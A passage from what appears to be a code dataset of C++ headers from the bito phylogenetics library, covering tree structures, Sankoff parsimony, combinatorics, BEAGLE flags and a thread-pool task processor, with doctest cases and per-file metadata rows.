instatiated, but may or may not be currently used for computation, and therefore // may not need to be upkept. TPEvalEngineTypeEnum::Array<bool> eval_engine_in_use_; // Un-owned reference to TP Evaluation Engine. Can be used to evaluate Top Trees // according to Likelihood, Parsimony, etc. TPEvalEngine *eval_engine_ = nullptr; // Engine evaluates top trees using likelihoods. std::unique_ptr<TPEvalEngineViaLikelihood> likelihood_engine_ = nullptr; // Engine evaluates top trees using parsimony. std::unique_ptr<TPEvalEngineViaParsimony> parsimony_engine_ = nullptr; };
25,220
C++
.h
471
48.711253
88
0.744875
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,124
stick_breaking_transform.hpp
phylovi_bito/src/stick_breaking_transform.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include "eigen_sugar.hpp" class Transform { public: virtual ~Transform() = default; virtual EigenVectorXd operator()(EigenVectorXd const& x) const = 0; virtual EigenVectorXd inverse(EigenVectorXd const& y) const = 0; virtual double log_abs_det_jacobian(const EigenVectorXd& x, const EigenVectorXd& y) const = 0; }; class IdentityTransform : public Transform { public: virtual ~IdentityTransform() = default; EigenVectorXd operator()(EigenVectorXd const& x) const override { return x; }; EigenVectorXd inverse(EigenVectorXd const& y) const override { return y; }; double log_abs_det_jacobian(const EigenVectorXd& x, const EigenVectorXd& y) const override { return 0; }; }; class StickBreakingTransform : public Transform { // The stick breaking procedure as defined in Stan // https://mc-stan.org/docs/2_26/reference-manual/simplex-transform-section.html public: virtual ~StickBreakingTransform() = default; EigenVectorXd operator()(EigenVectorXd const& x) const; EigenVectorXd inverse(EigenVectorXd const& y) const; double log_abs_det_jacobian(const EigenVectorXd& x, const EigenVectorXd& y) const; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("BreakingStickTransform") { StickBreakingTransform a; EigenVectorXd y(3); y << 1., 2., 3.; EigenVectorXd x_expected(4); // x_expected = // torch.distributions.StickBreakingTransform()(torch.tensor([1., 2., 3.])) x_expected << 0.475367, 0.412879, 0.106454, 0.00530004; EigenVectorXd x = a(y); CheckVectorXdEquality(x, x_expected, 1.e-5); EigenVectorXd yy = a.inverse(x); CheckVectorXdEquality(y, yy, 1e-5); // log_abs_det_jacobian_expected = // torch.distributions.StickBreakingTransform().log_abs_det_jacobian(y,x) double log_abs_det_jacobian_expected = -9.108352; CHECK(a.log_abs_det_jacobian(x, y) == doctest::Approx(log_abs_det_jacobian_expected).epsilon(1.e-5)); } #endif // DOCTEST_LIBRARY_INCLUDED
2,143
C++
.h
51
37.921569
84
0.72701
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,125
quartet_hybrid_request.hpp
phylovi_bito/src/quartet_hybrid_request.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Stores a "request" for a quartet hybrid marginal calculation. #pragma once #include <iostream> #include <vector> struct QuartetTip { constexpr QuartetTip(size_t tip_node_id, size_t plv_idx, size_t gpcsp_idx) : tip_node_id_(tip_node_id), plv_idx_(plv_idx), gpcsp_idx_(gpcsp_idx){}; size_t tip_node_id_; size_t plv_idx_; size_t gpcsp_idx_; }; using QuartetTipVector = std::vector<QuartetTip>; struct QuartetHybridRequest { QuartetHybridRequest(size_t central_gpcsp_idx, QuartetTipVector rootward_tips, QuartetTipVector sister_tips, QuartetTipVector rotated_tips, QuartetTipVector sorted_tips) : central_gpcsp_idx_(central_gpcsp_idx), rootward_tips_(std::move(rootward_tips)), sister_tips_(std::move(sister_tips)), rotated_tips_(std::move(rotated_tips)), sorted_tips_(std::move(sorted_tips)){}; // Are each of the tip vectors non-empty? bool IsFullyFormed() const; size_t central_gpcsp_idx_; QuartetTipVector rootward_tips_; QuartetTipVector sister_tips_; QuartetTipVector rotated_tips_; QuartetTipVector sorted_tips_; }; std::ostream& operator<<(std::ostream& os, QuartetTip const& plv_pcsp); std::ostream& operator<<(std::ostream& os, QuartetTipVector const& plv_pcsp_vector); std::ostream& operator<<(std::ostream& os, QuartetHybridRequest const& request);
1,507
C++
.h
35
38.571429
84
0.719945
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,127
beagle_flag_names.hpp
phylovi_bito/src/beagle_flag_names.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // BeagleAccessories are collections of artifacts that we can make in constant // time given the tree, and remain const througout any operation-gathering tree // traversal. #pragma once #include <bitset> #include <limits> #include <string> #include <vector> #include "libhmsbeagle/beagle.h" namespace BeagleFlagNames { constexpr int long_bit_count = std::numeric_limits<long>::digits + 1; static const std::vector<std::string> name_vector{ "PRECISION_SINGLE", // 00 Single precision computation "PRECISION_DOUBLE", // 01 Double precision computation "COMPUTATION_SYNCH", // 02 Synchronous computation (blocking) "COMPUTATION_ASYNCH", // 03 Asynchronous computation (non-blocking) "EIGEN_REAL", // 04 Real eigenvalue computation "EIGEN_COMPLEX", // 05 Complex eigenvalue computation "SCALING_MANUAL", // 06 Manual scaling "SCALING_AUTO", // 07 Auto-scaling on (deprecated) "SCALING_ALWAYS", // 08 Scale at every updatePartials (deprecated) "SCALERS_RAW", // 09 Save raw scalers "SCALERS_LOG", // 10 Save log scalers "VECTOR_SSE", // 11 SSE computation "VECTOR_NONE", // 12 No vector computation "THREADING_OPENMP", // 13 OpenMP threading "THREADING_NONE", // 14 No threading (default) "PROCESSOR_CPU", // 15 Use CPU as main processor "PROCESSOR_GPU", // 16 Use GPU as main processor "PROCESSOR_FPGA", // 17 Use FPGA as main processor "PROCESSOR_CELL", // 18 Use Cell as main processor "PROCESSOR_PHI", // 19 Use Intel Phi as main processor "INVEVEC_STANDARD", // 20 Inverse eigen vectors have not been transposed "INVEVEC_TRANSPOSED", // 21 Inverse eigen vectors have been transposed "FRAMEWORK_CUDA", // 22 Use CUDA implementation with GPU resources "FRAMEWORK_OPENCL", // 23 Use OpenCL implementation with GPU resources "VECTOR_AVX", // 24 AVX computation "SCALING_DYNAMIC", // 25 Manual scaling with dynamic checking (deprecated) "PROCESSOR_OTHER", // 26 Use other type of processor "FRAMEWORK_CPU", // 27 Use CPU implementation "PARALLELOPS_STREAMS", // 28 Ops may be assigned to separate device streams "PARALLELOPS_GRID", // 29 Ops may be folded into single kernel launch "THREADING_CPP", // 30 C++11 threading }; std::string OfBeagleFlags(long flags) { std::bitset<long_bit_count> beagle_bitset{static_cast<unsigned long long>(flags)}; std::string set_flags; std::string perhaps_space; for (size_t bit_idx = 0; bit_idx < name_vector.size(); ++bit_idx) { if (beagle_bitset.test(bit_idx)) { set_flags += perhaps_space + name_vector.at(bit_idx); if (perhaps_space.empty()) { perhaps_space = " "; } } } return set_flags; } } // namespace BeagleFlagNames
3,045
C++
.h
62
45.241935
84
0.66958
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,128
unrooted_tree.hpp
phylovi_bito/src/unrooted_tree.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <vector> #include "tree.hpp" class UnrootedTree : public Tree { public: typedef std::vector<UnrootedTree> UnrootedTreeVector; // See tree.hpp for description of constructors. UnrootedTree(const Node::NodePtr& topology, BranchLengthVector branch_lengths); UnrootedTree(const Node::NodePtr& topology, TagDoubleMap branch_lengths); explicit UnrootedTree(Tree tree) : UnrootedTree(tree.Topology(), std::move(tree.branch_lengths_)){}; UnrootedTree DeepCopy() const; bool operator==(const Tree& other) const = delete; bool operator==(const UnrootedTree& other) const; // Returns a new version of this tree without a trifurcation at the root, // making it a bifurcation. Given (s0:b0, s1:b1, s2:b2):b4, we get (s0:b0, // (s1:b1, s2:b2):0):0. Note that we zero out the root branch length. Tree Detrifurcate() const; static UnrootedTree UnitBranchLengthTreeOf(const Node::NodePtr& topology); static UnrootedTree OfParentIdVector(const std::vector<size_t>& indices); static TreeVector ExampleTrees() = delete; private: static void AssertTopologyTrifurcatingInConstructor(const Node::NodePtr& topology); }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("UnrootedTree") { auto trees = Tree::ExampleTrees(); auto unrooted_tree = UnrootedTree(trees[0]); auto original_newick = unrooted_tree.Newick(); CHECK_EQ(unrooted_tree.Detrifurcate().Topology(), trees[3].Topology()); // Shows that Detrifurcate doesn't change the original tree. CHECK_EQ(original_newick, unrooted_tree.Newick()); auto topologies = Node::ExampleTopologies(); // This should work: topology has trifurcation at the root. UnrootedTree::UnitBranchLengthTreeOf(topologies[0]); // This shouldn't. CHECK_THROWS_AS(UnrootedTree::UnitBranchLengthTreeOf(topologies[3]), std::runtime_error&); } #endif // DOCTEST_LIBRARY_INCLUDED
2,009
C++
.h
42
44.642857
85
0.759079
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,129
combinatorics.hpp
phylovi_bito/src/combinatorics.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <cmath> #include <cstddef> namespace Combinatorics { // The number of topologies on the given number of taxa. double TopologyCount(size_t taxon_count); // The log of the number of topologies on the given number of taxa. double LogTreeCount(size_t taxon_count); // Define the child subsplit count ratio for (n0, n1) as the number of topologies with // n0 taxa times the number of topologies with n1 taxa divided by the number of // topologies with n0+n1 taxa. This is a prior probability for a subsplit with (n0, n1) // taxa conditioned on it resolving a subsplit on n0+n1 taxa under the uniform // distribution on topologies. // // Naive version: double LogChildSubsplitCountRatioNaive(size_t child0_taxon_count, size_t child1_taxon_count); // Non-naive version: double LogChildSubsplitCountRatio(size_t child0_taxon_count, size_t child1_taxon_count); } // namespace Combinatorics #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("Combinatorics") { CHECK_EQ(Combinatorics::TopologyCount(1), 1.); CHECK_EQ(Combinatorics::TopologyCount(2), 1.); CHECK_EQ(Combinatorics::TopologyCount(3), 3.); CHECK_EQ(Combinatorics::TopologyCount(4), 15.); CHECK_EQ(Combinatorics::TopologyCount(5), 105.); CHECK_EQ(Combinatorics::TopologyCount(6), 945.); CHECK_EQ(Combinatorics::TopologyCount(7), 10395.); for (size_t taxon_count = 1; taxon_count < 20; taxon_count++) { CHECK_LT(fabs(Combinatorics::LogTreeCount(taxon_count) - std::log(Combinatorics::TopologyCount(taxon_count))), 1e-10); } for (size_t child0_count = 1; child0_count < 10; child0_count++) { for (size_t child1_count = 1; child1_count < 10; child1_count++) { CHECK_LT( fabs(Combinatorics::LogChildSubsplitCountRatio(child0_count, child1_count) - Combinatorics::LogChildSubsplitCountRatioNaive(child0_count, child1_count)), 1e-10); } } } #endif // DOCTEST_LIBRARY_INCLUDED
2,174
C++
.h
47
40.659574
88
0.702077
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,130
sankoff_handler.hpp
phylovi_bito/src/sankoff_handler.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Methods to calculate Sankoff on a tree. #pragma once #include "eigen_sugar.hpp" #include "sugar.hpp" #include "sankoff_matrix.hpp" #include "site_pattern.hpp" #include "node.hpp" #include "driver.hpp" #include "pv_handler.hpp" #include "gp_dag.hpp" // Partial vector for one node across all sites using SankoffPartial = NucleotidePLV; // Each SankoffPartial represents calculations for one node using SankoffPartialVec = std::vector<SankoffPartial>; // references for SankoffPartials using SankoffPartialRef = Eigen::Ref<SankoffPartial>; using SankoffPartialRefVec = std::vector<SankoffPartialRef>; class SankoffHandler { public: // DNA assumption static constexpr size_t state_count_ = 4; static constexpr double big_double_ = static_cast<double>(INT_MAX); // Constructors SankoffHandler(SitePattern site_pattern, const std::string &mmap_file_path, double resizing_factor = 2.0) : mutation_costs_(SankoffMatrix()), site_pattern_(std::move(site_pattern)), resizing_factor_(resizing_factor), psv_handler_(mmap_file_path, 0, site_pattern_.PatternCount(), resizing_factor_) { Assert(site_pattern_.SequenceCount() == site_pattern_.TaxonCount(), "Error in SankoffHandler constructor 1: Every sequence should be associated " "with a node."); psv_handler_.SetCount(site_pattern_.TaxonCount()); psv_handler_.SetAllocatedCount( size_t(ceil(double(psv_handler_.GetPaddedCount()) * resizing_factor_))); psv_handler_.Resize(site_pattern_.TaxonCount(), psv_handler_.GetAllocatedCount()); } SankoffHandler(CostMatrix cost_matrix, SitePattern site_pattern, const std::string &mmap_file_path, double resizing_factor = 2.0) : mutation_costs_(SankoffMatrix(cost_matrix)), site_pattern_(std::move(site_pattern)), resizing_factor_(resizing_factor), psv_handler_(mmap_file_path, 0, site_pattern_.PatternCount(), resizing_factor_) { Assert(site_pattern_.SequenceCount() == site_pattern_.TaxonCount(), "Error in SankoffHandler constructor 2: Every sequence should be associated " "with a node."); psv_handler_.SetCount(site_pattern_.TaxonCount()); psv_handler_.SetAllocatedCount( size_t(ceil(double(psv_handler_.GetPaddedCount()) * resizing_factor_))); psv_handler_.Resize(site_pattern_.TaxonCount(), psv_handler_.GetAllocatedCount()); } SankoffHandler(SankoffMatrix sankoff_matrix, SitePattern site_pattern, const std::string &mmap_file_path, double resizing_factor = 2.0) : mutation_costs_(std::move(sankoff_matrix)), site_pattern_(std::move(site_pattern)), resizing_factor_(resizing_factor), psv_handler_(mmap_file_path, 0, site_pattern_.PatternCount(), resizing_factor_) { Assert(site_pattern_.SequenceCount() == site_pattern_.TaxonCount(), "Error in SankoffHandler constructor 3: Every sequence should be associated " "with a node."); psv_handler_.SetCount(site_pattern_.TaxonCount()); psv_handler_.SetAllocatedCount( size_t(ceil(double(psv_handler_.GetPaddedCount()) * resizing_factor_))); psv_handler_.Resize(site_pattern_.TaxonCount(), psv_handler_.GetAllocatedCount()); } PSVNodeHandler &GetPSVHandler() { return psv_handler_; } SankoffMatrix &GetCostMatrix() { return mutation_costs_; } // Resize PVs to fit model. void Resize(const size_t new_node_count); // Partial Sankoff Vector Handler. SankoffPartialVec PartialsAtPattern(PSVType psv_type, size_t pattern_idx) { SankoffPartialVec partials_at_pattern(psv_handler_.GetCount()); for (NodeId node = 0; node < psv_handler_.GetCount(); node++) { partials_at_pattern[node.value_] = psv_handler_(psv_type, node).col(pattern_idx); } return partials_at_pattern; } // Fill in leaf-values for P partials. void GenerateLeafPartials(); // Sum p-partials for right and left children of node 'node_id' // In this case, we get the full p-partial of the given node after all p-partials // have been concatenated into one SankoffPartialVector EigenVectorXd TotalPPartial(NodeId node_id, size_t site_idx); // Calculate the partial for a given parent-child pair EigenVectorXd ParentPartial(EigenVectorXd child_partials); // Populate rootward parsimony PV for node. void PopulateRootwardParsimonyPVForNode(const NodeId parent_id, const NodeId left_child_id, const NodeId right_child_id); // Populate leafward parsimony PV for node. void PopulateLeafwardParsimonyPVForNode(const NodeId parent_id, const NodeId left_child_id, const NodeId right_child_id); // Calculates left p_partials, right p_partials, and q_partials for all nodes at all // sites in tree topology. void RunSankoff(Node::NodePtr topology); // Calculates parsimony score on given node across all sites. double ParsimonyScore(NodeId node_id = NodeId(0)); private: SankoffMatrix mutation_costs_; SitePattern site_pattern_; double resizing_factor_; PSVNodeHandler psv_handler_; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("SankoffHandler: Tests on single site sequence.") { auto fasta_file = "data/hello_single_nucleotide.fasta"; auto newick_file = "data/hello_rooted.nwk"; Alignment alignment = Alignment::ReadFasta(fasta_file); Driver driver; RootedTreeCollection tree_collection = RootedTreeCollection::OfTreeCollection(driver.ParseNewickFile(newick_file)); SitePattern site_pattern = SitePattern(alignment, tree_collection.TagTaxonMap()); Node::NodePtr topology = tree_collection.GetTree(0).Topology(); size_t taxon_count = site_pattern.TaxonCount(); // transitions have cost 1 and transversions have cost 2.5 auto costs = CostMatrix(); costs << 0., 2.5, 1., 2.5, // 2.5, 0., 2.5, 1., // 1., 2.5, 0., 2.5, // 2.5, 1., 2.5, 0.; // SankoffHandler sh = SankoffHandler(costs, site_pattern, "_ignore/mmapped_psv.data"); // testing RunSankoff for one site sh.RunSankoff(topology); // testing GenerateLeafPartials() method (which is run as first step of RunSankoff) SankoffPartialVec leaves_test = sh.PartialsAtPattern(PSVType::PLeft, 0); auto big_double = SankoffHandler::big_double_; SankoffPartial leaves_correct_pattern_0(4, topology->Id() + 1); // column 1 is G(jupiter), column 2 is C(mars), Column 3 is G(saturn) leaves_correct_pattern_0 << big_double, big_double, big_double, 0., 0., big_double, 0., big_double, 0., 0., 0., big_double, 0., 0., 0., big_double, big_double, big_double, 0., 0.; for (size_t r = 0; r < taxon_count; r++) { CHECK(leaves_test[r].isApprox(leaves_correct_pattern_0.col(r))); } // test parsimony score for RunSankoff CHECK_LT(fabs(sh.ParsimonyScore(0) - 2.5), 1e-10); // testing 3rd constructor: SankoffHandler(SankoffMatrix, SitePattern) constructor SankoffMatrix sm = SankoffMatrix(costs); SankoffHandler sh2 = SankoffHandler(sm, site_pattern, "_ignore/mmapped_psv.data"); // testing ParentPartial() auto child_partials = Eigen::Matrix<double, 4, 2>(); child_partials << 2.5, 3.5, 3.5, 3.5, 2.5, 3.5, 3.5, 4.5; auto parent_test = Eigen::Matrix<double, 4, 1>(); parent_test.setZero(); for (size_t child = 0; child < 2; child++) { parent_test += sh2.ParentPartial(child_partials.col(child)); } auto parent_correct = Eigen::Matrix<double, 4, 1>(); parent_correct << 6., 7., 6., 8.; CHECK(parent_test.isApprox(parent_correct)); } TEST_CASE("SankoffHandler: Asymmetric cost matrix test on single site sequence.") { auto fasta_file = "data/hello_single_nucleotide.fasta"; auto newick_file = "data/hello_rooted.nwk"; Alignment alignment = Alignment::ReadFasta(fasta_file); Driver driver; RootedTreeCollection tree_collection = RootedTreeCollection::OfTreeCollection(driver.ParseNewickFile(newick_file)); SitePattern site_pattern = SitePattern(alignment, tree_collection.TagTaxonMap()); Node::NodePtr topology = tree_collection.GetTree(0).Topology(); // transitions have cost 1 and transversions have cost 2.5 auto costs = CostMatrix(); costs << 0., 2., 3., 4., // 5., 0., 7., 8., // 9., 10., 0., 12., // 13., 14., 15., 0.; // SankoffHandler sh = SankoffHandler(costs, site_pattern, "_ignore/mmapped_psv.data"); sh.RunSankoff(topology); CHECK_LT(fabs(sh.ParsimonyScore(0) - 8.), 1e-10); } TEST_CASE("SankoffHandler: Testing sequence gap characters in GenerateLeafPartials()") { auto fasta_file = "data/hello.fasta"; auto newick_file = "data/hello_rooted.nwk"; Alignment alignment = Alignment::ReadFasta(fasta_file); Driver driver; RootedTreeCollection tree_collection = RootedTreeCollection::OfTreeCollection(driver.ParseNewickFile(newick_file)); SitePattern site_pattern = SitePattern(alignment, tree_collection.TagTaxonMap()); Node::NodePtr topology = tree_collection.GetTree(0).Topology(); size_t taxon_count = site_pattern.TaxonCount(); // test set up for SankoffHandler with default cost matrix SankoffHandler default_sh = SankoffHandler(site_pattern, "_ignore/mmapped_psv.data"); // testing GenerateLeafPartials() method default_sh.GenerateLeafPartials(); auto leaves_test = default_sh.PartialsAtPattern(PSVType::PLeft, 14); SankoffPartial leaves_correct_pattern_14(4, topology->Id() + 1); auto big_double = SankoffHandler::big_double_; // column 1 is G(jupiter), column 2 is -(mars), Column 3 is G(saturn) leaves_correct_pattern_14 << big_double, 0., big_double, 0., 0., big_double, 0., big_double, 0., 0., 0., 0., 0., 0., 0., big_double, 0., big_double, 0., 0.; for (size_t r = 0; r < taxon_count; r++) { CHECK(leaves_test[r].isApprox(leaves_correct_pattern_14.col(r))); } } TEST_CASE("SankoffHandler: RunSankoff and ParsimonyScore Tests") { auto fasta_file = "data/parsimony_leaf_seqs.fasta"; auto newick_file = "data/parsimony_tree_0_score_75.0.nwk"; Alignment alignment = Alignment::ReadFasta(fasta_file); Driver driver; RootedTreeCollection tree_collection = RootedTreeCollection::OfTreeCollection(driver.ParseNewickFile(newick_file)); SitePattern site_pattern = SitePattern(alignment, tree_collection.TagTaxonMap()); Node::NodePtr topology = tree_collection.GetTree(0).Topology(); // test set up for SankoffHandler with default cost matrix SankoffHandler default_sh = SankoffHandler(site_pattern, "_ignore/mmapped_psv.data"); double parsimony_score_correct = 75.; default_sh.RunSankoff(topology); for (NodeId node_id = 0; node_id < topology->Id() + 1; node_id++) { CHECK_LT(fabs(default_sh.ParsimonyScore(node_id) - parsimony_score_correct), 1e-10); } } #endif // DOCTEST_LIBRARY_INCLUDED
11,077
C++
.h
219
45.447489
88
0.705203
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,131
generic_tree_collection.hpp
phylovi_bito/src/generic_tree_collection.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <fstream> #include <memory> #include <string> #include <unordered_map> #include <utility> #include <vector> #include "tree.hpp" template <typename TTree> class GenericTreeCollection { protected: using TTreeVector = std::vector<TTree>; public: GenericTreeCollection() = default; explicit GenericTreeCollection(TTreeVector trees) : trees_(std::move(trees)) { if (!trees_.empty()) { auto leaf_count = trees_[0].LeafCount(); auto different_leaf_count = [leaf_count](const auto &tree) { return tree.LeafCount() != leaf_count; }; if (std::any_of(trees_.cbegin(), trees_.cend(), different_leaf_count)) { Failwith("Trees must all have the same number of tips in a tree collection."); } } } GenericTreeCollection(TTreeVector trees, TagStringMap tag_taxon_map) : trees_(std::move(trees)), tag_taxon_map_(std::move(tag_taxon_map)) { auto taxon_count = tag_taxon_map.size(); auto different_taxon_count = [taxon_count](const auto &tree) { return tree.LeafCount() != taxon_count; }; if (std::any_of(trees.cbegin(), trees.cend(), different_taxon_count)) { Failwith( "Tree leaf count doesn't match the size of tag_taxon_map when building a " "tree collection."); } } GenericTreeCollection(TTreeVector trees, const std::vector<std::string> &taxon_labels) : GenericTreeCollection(std::move(trees), TagStringMapOf(taxon_labels)) {} size_t TreeCount() const { return trees_.size(); } const TTreeVector &Trees() const { return trees_; } const TTree &GetTree(size_t i) const { return trees_.at(i); } // A tag is a packed int of two values: (1) node id, (2) leaf count below node. For // taxa, the node id is the taxon id and the leaf count is 1. const TagStringMap &TagTaxonMap() const { return tag_taxon_map_; } size_t TaxonCount() const { return tag_taxon_map_.size(); } bool operator==(const GenericTreeCollection<TTree> &other) const { if (this->TagTaxonMap() != other.TagTaxonMap()) { return false; } if (TreeCount() != other.TreeCount()) { return false; } for (size_t i = 0; i < TreeCount(); i++) { if (this->GetTree(i) != other.GetTree(i)) { return false; } } return true; } // Remove trees from begin_idx to just before end_idx. void Erase(size_t begin_idx, size_t end_idx) { if (begin_idx > end_idx || end_idx > TreeCount()) { Failwith("Illegal arguments to Tree_Collection.Erase."); } // else: using difference_type = typename TTreeVector::difference_type; trees_.erase(trees_.begin() + static_cast<difference_type>(begin_idx), trees_.begin() + static_cast<difference_type>(end_idx)); } // Drop the first fraction trees from the collection. void DropFirst(double fraction) { Assert(fraction >= 0. && fraction <= 1., "Illegal argument to DropFirst."); auto end_idx = static_cast<size_t>(fraction * static_cast<double>(TreeCount())); Erase(0, end_idx); } // Build a tree collection by duplicating the first tree loaded. GenericTreeCollection<TTree> BuildCollectionByDuplicatingFirst( size_t number_of_times) { TTreeVector tree_vector; Assert(TreeCount() > 0, "Need at least one tree if we are to duplicate the first."); tree_vector.reserve(number_of_times); for (size_t idx = 0; idx < number_of_times; idx++) { tree_vector.push_back(GetTree(0).DeepCopy()); } return GenericTreeCollection<TTree>(std::move(tree_vector), TagTaxonMap()); } std::string Newick() const { std::string str; for (const auto &tree : trees_) { if (tag_taxon_map_.empty()) { str.append(tree.Newick()); } else { str.append(tree.Newick(tag_taxon_map_)); } str.push_back('\n'); } return str; } void ToNewickFile(const std::string &out_path) const { std::ofstream out_stream(out_path); out_stream << Newick(); out_stream.close(); if (!out_stream) { Failwith("ToNewickFile: could not write file to " + out_path); } } void ToNewickTopologyFile(const std::string &out_path) const { std::ofstream out_stream(out_path); for (const auto &tree : trees_) { out_stream << tree.NewickTopology(tag_taxon_map_) << std::endl; } out_stream.close(); if (!out_stream) { Failwith("ToNewickTopologyFile: could not write file to " + out_path); } } Node::TopologyCounter TopologyCounter() const { Node::TopologyCounter counter; for (const auto &tree : trees_) { auto search = counter.find(tree.Topology()); if (search == counter.end()) { SafeInsert(counter, tree.Topology(), static_cast<uint32_t>(1)); } else { search->second++; } } return counter; } std::vector<std::string> TaxonNames() const { std::vector<std::string> names(tag_taxon_map_.size()); for (const auto &iter : tag_taxon_map_) { size_t id = MaxLeafIDOfTag(iter.first); Assert(id < names.size(), "Leaf ID is out of range in TaxonNames for tree collection."); names[id] = iter.second; } return names; } static TagStringMap TagStringMapOf(const std::vector<std::string> &taxon_labels) { TagStringMap taxon_map; for (size_t index = 0; index < taxon_labels.size(); index++) { SafeInsert(taxon_map, PackInts(static_cast<uint32_t>(index), 1), taxon_labels[index]); } return taxon_map; } static GenericTreeCollection UnitBranchLengthTreesOf( std::vector<Node::NodePtr> topologies, TagStringMap tag_taxon_map) { std::vector<TTree> tree_vector; for (const auto &topology : topologies) { tree_vector.push_back(TTree::UnitBranchLengthTreeOf(topology)); } return GenericTreeCollection(tree_vector, tag_taxon_map); } auto begin() const { return trees_.begin(); } auto end() const { return trees_.end(); } TTreeVector trees_; protected: TagStringMap tag_taxon_map_; }; // Tests appear in non-generic subclasses.
6,214
C++
.h
164
32.786585
88
0.661464
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,132
task_processor.hpp
phylovi_bito/src/task_processor.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // This code started life as the example from the excellent blog post at // https://embeddedartistry.com/blog/2017/2/1/c11-implementing-a-dispatch-queue-using-stdfunction // // The setup is that we have a Task that we want to run on a bunch of units of // Work. The Task needs an Executor to run, and we have a pool of those // available. We want to run the Tasks in parallel on as many threads as we have // Executors. // // For this, build queues of Executors and Work, then make a TaskProcessor out // of them that does the work as specified in the queues. Work begins right away // in the constructor. To get the work to complete, you can just let the // TaskProcessor go out of scope, or explicitly call the Wait method for it to // complete. // // Note that we don't make any effort to ensure safety. For example, there is // nothing keeping you from having abundant data races if your Executors have // non-independent state. // // The fact that there are fewer Executors than Tasks is what requires some // design like this-- we can't just use something like a C++17 parallel for // loop. // // I realize that it's not recommended to write your own thread-handling // library, and for good reason: see https://www.youtube.com/watch?v=QIHy8pXbneI // https://sean-parent.stlab.cc/presentations/2016-08-08-concurrency/2016-08-08-concurrency.pdf // However, here the tasks are few and big, the time required during locking is // small (put an integer in a dequeue). The overhead of including a true // threading library wouldn't be worth it for this example. #pragma once #include <condition_variable> #include <functional> #include <mutex> #include <queue> #include <thread> #include <vector> template <class Executor, class Work> class TaskProcessor { public: using Task = std::function<void(Executor, Work)>; using ExecutorQueue = std::queue<Executor>; using WorkQueue = std::queue<Work>; TaskProcessor(ExecutorQueue executor_queue, WorkQueue work_queue, Task task) : executor_queue_(executor_queue), work_queue_(work_queue), task_(task), threads_(executor_queue.size()) { // Make as many threads as there are executors. for (size_t i = 0; i < threads_.size(); i++) { threads_[i] = std::thread(&TaskProcessor::thread_handler, this); } Wait(); } // Delete (copy + move) x (constructor + assignment) TaskProcessor(const TaskProcessor &) = delete; TaskProcessor(const TaskProcessor &&) = delete; TaskProcessor &operator=(const TaskProcessor &) = delete; TaskProcessor &operator=(const TaskProcessor &&) = delete; ~TaskProcessor() {} void Wait() { condition_variable_.notify_all(); // Wait for threads to finish before we exit for (size_t i = 0; i < threads_.size(); i++) { if (threads_[i].joinable()) { threads_[i].join(); } } threads_rejoined_ = true; if (exception_ptr_ != nullptr) { std::rethrow_exception(exception_ptr_); } } private: ExecutorQueue executor_queue_; WorkQueue work_queue_; Task task_; std::vector<std::thread> threads_; std::mutex lock_; std::condition_variable condition_variable_; bool threads_rejoined_ = false; std::exception_ptr exception_ptr_ = nullptr; std::mutex exception_lock_; void thread_handler() { std::unique_lock<std::mutex> lock(lock_); bool exception_occurred = false; // Continue allocating free executors for work until no more work. while (work_queue_.size()) { // Check if any thread has recorded an exception. If so, end work. exception_lock_.lock(); exception_occurred = (exception_ptr_ != nullptr); exception_lock_.unlock(); if (exception_occurred) { break; } // Wait until we have an executor available. This right here is the key of // the whole implementation, giving a nice way to wait until the resources // are available to run the next thing in the queue. condition_variable_.wait(lock, [this] { return executor_queue_.size(); }); // After wait, we own the lock. if (work_queue_.size()) { auto work = work_queue_.front(); work_queue_.pop(); auto executor = executor_queue_.front(); executor_queue_.pop(); // Unlock now that we're done messing with the queues. lock.unlock(); // Run task. try { task_(executor, work); } catch (...) { // If the task throws an exception, make record it for the master thread. exception_lock_.lock(); if (exception_ptr_ == nullptr) { exception_ptr_ = std::current_exception(); } exception_lock_.unlock(); } // Lock again so that we can mess with the queues. lock.lock(); // We're done with the executor so we can put it back on the queue. executor_queue_.push(executor); } } } }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("TaskProcessor") { std::queue<int> executor_queue; std::queue<size_t> work_queue; std::vector<float> results(8); // Say we have 4 executors. for (auto i = 0; i < 4; i++) { executor_queue.push(i); } // Our Work in this example is just size_t's. for (size_t i = 0; i < results.size(); i++) { work_queue.push(i); } // And our task is just to cast this size_t to a float and store it in the // corresponding location of the results array. auto task = [&results](int /*executor*/, size_t work) { // std::cout << "work " << work << " on " << executor << std::endl; results[work] = static_cast<float>(work); }; TaskProcessor<int, 